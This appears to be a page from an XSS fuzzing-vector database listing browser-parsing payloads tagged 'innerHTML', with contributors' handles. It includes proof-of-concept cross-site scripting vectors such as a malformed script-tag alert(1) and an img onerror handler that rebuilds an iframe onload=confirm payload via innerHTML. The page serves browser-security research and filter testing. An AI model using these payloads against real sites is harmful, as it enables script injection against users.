Featured vector
Safari 0.0
<script>alert(1)<0x3cscript> <script>alert(1)<0x3c/script> <script>alert(1)0x3c/script>
<script>alert(1)<0x3cscript> <script>alert(1)<0x3c/script> <script>alert(1)0x3c/script>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data entities entity event events expression flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml
3,426,123 Successful fuzzes
Fuzz Vectors
Searching for "innerHTML"
Your browser identified asGeneral Crawlers unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| incorrect innerHTML serialization | <*datahtmlelements*><</*datahtmlelements*> <*datahtmlelements*/><</*datahtmlelements*> | @garethheyes |
| Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket | <body> §iframe onload=confirm(/xss/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* | @secalert |
| Single character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Entity character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Characters breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |